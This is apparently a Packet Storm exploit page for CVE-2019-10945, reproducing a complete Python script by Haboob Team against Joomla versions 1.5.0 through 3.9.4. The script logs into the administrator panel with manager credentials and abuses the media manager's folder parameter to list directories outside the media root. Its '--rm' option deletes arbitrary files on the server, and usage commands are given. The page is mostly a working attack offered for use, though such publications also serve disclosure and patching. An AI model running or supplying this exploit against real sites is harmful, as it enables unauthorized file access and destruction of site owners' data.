what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal

Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal
Posted Apr 16, 2019
Authored by Haboob Team

Joomla versions 1.5.0 through 3.9.4 suffer from arbitrary file deletion and directory traversal vulnerabilities.

tags | exploit, arbitrary, vulnerability, file inclusion
advisories | CVE-2019-10945
SHA-256 | 53b8b3b18868765214204a82f2af5d3caa0c20dbe06f39856c11642e46e530b9

Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal

Change Mirror Download
# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Date: 2019-March-13
# Exploit Author: Haboob Team
# Web Site: haboob.sa
# Email: research@haboob.sa
# Software Link: https://www.joomla.org/
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# CVE : CVE-2019-10945
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
#
# Usage:
# List files in the specified directory:
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
#
# Delete file in specified directory
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>


import re
import tempfile
import pickle
import os
import hashlib
import urllib

try:
import click
except ImportError:
print("module 'click' doesn't exist, type: pip install click")
exit(0)

try:
import requests
except ImportError:
print("module 'requests' doesn't exist, type: pip install requests")
exit(0)
try:
import lxml.html
except ImportError:
print("module 'lxml' doesn't exist, type: pip install lxml")
exit(0)

mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."

print '''
# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Web Site: Haboob.sa
# Email: research@haboob.sa
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
_ _ ____ ____ ____ ____
| | | | /\ | _ \ / __ \ / __ \| _ \
| |__| | / \ | |_) | | | | | | | |_) |
| __ | / /\ \ | _ <| | | | | | | _ <
| | | |/ ____ \| |_) | |__| | |__| | |_) |
|_| |_/_/ \_\____/ \____/ \____/|____/

'''
class URL(click.ParamType):
name = 'url'
regex = re.compile(
r'^(?:http)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)

def convert(self, value, param, ctx):
if not isinstance(value, tuple):
if re.match(self.regex, value) is None:
self.fail('invalid URL (%s)' % value, param, ctx)
return value


def getForm(url, query, cookie=''):
r = requests.get(url, cookies=cookie, timeout=5)
if r.status_code != 200:
print("invalid URL: 404 NOT FOUND!!")
exit(0)
page = r.text.encode('utf-8')
html = lxml.html.fromstring(page)
return html.xpath(query), r.cookies


def login(url, username, password):
csrf, cookie = getForm(url, '//input/@name')
postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
'return': 'aW5kZXgucGhw', csrf[-1]: 1}

res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
if res.status_code == 200:
html = lxml.html.fromstring(res.text)
msg = html.xpath("//div[@class='alert-message']/text()[1]")
print msg
exit()
else:
get_cookies(res.cookies.get_dict(), url, username, password)


def save_cookies(requests_cookiejar, filename):
with open(filename, 'wb') as f:
pickle.dump(requests_cookiejar, f)


def load_cookies(filename):
with open(filename, 'rb') as f:
return pickle.load(f)


def cookies_file_name(url, username, password):
result = hashlib.md5(str(url) + str(username) + str(password))
_dir = tempfile.gettempdir()
return _dir + "/" + result.hexdigest() + ".Jcookie"


def get_cookies(req_cookie, url, username, password):
cookie_file = cookies_file_name(url, username, password)
if os.path.isfile(cookie_file):
return load_cookies(cookie_file)
else:
save_cookies(req_cookie, cookie_file)
return req_cookie


def traversal(url, username, password, dir=None):
cookie = get_cookies('', url, username, password)
url = url + mediaList + dir
files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
for file in files:
print file
pass


def removeFile(baseurl, username, password, dir='', file=''):
cookie = get_cookies('', baseurl, username, password)
url = baseurl + mediaList + dir
link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
if link:
link = urllib.unquote(link[0].encode("utf8"))
link = link.split('folder=')[0]
link = link.replace("folder.delete", "file.delete")
link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
if len(msg) == 0:
print "ERROR : File does not exist"
else:
print msg
else:
print "ERROR:404 NOT FOUND!!"


@click.group(invoke_without_command=True)
@click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
@click.option('--username', type=str, help="Joomla Manager username", required=True)
@click.option('--password', type=str, help="Joomla Manager password", required=True)
@click.option('--dir', type=str, help="listing directory")
@click.option('--rm', type=str, help="delete file")
@click.pass_context
def cli(ctx, url, username, password, dir, rm):
url = url+"/"
cookie_file = cookies_file_name(url, username, password)
if not os.path.isfile(cookie_file):
login(url, username, password)
if dir is not None:
dir = dir.lstrip('/')
dir = dir.rstrip('/')
dir = "/" + dir
if dir == "/" or dir == "../" or dir == "/.":
dir = ''
else:
dir = ''
print dir
if rm is not None:
removeFile(url, username, password, dir, rm)
else:
traversal(url, username, password, dir)


cli()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close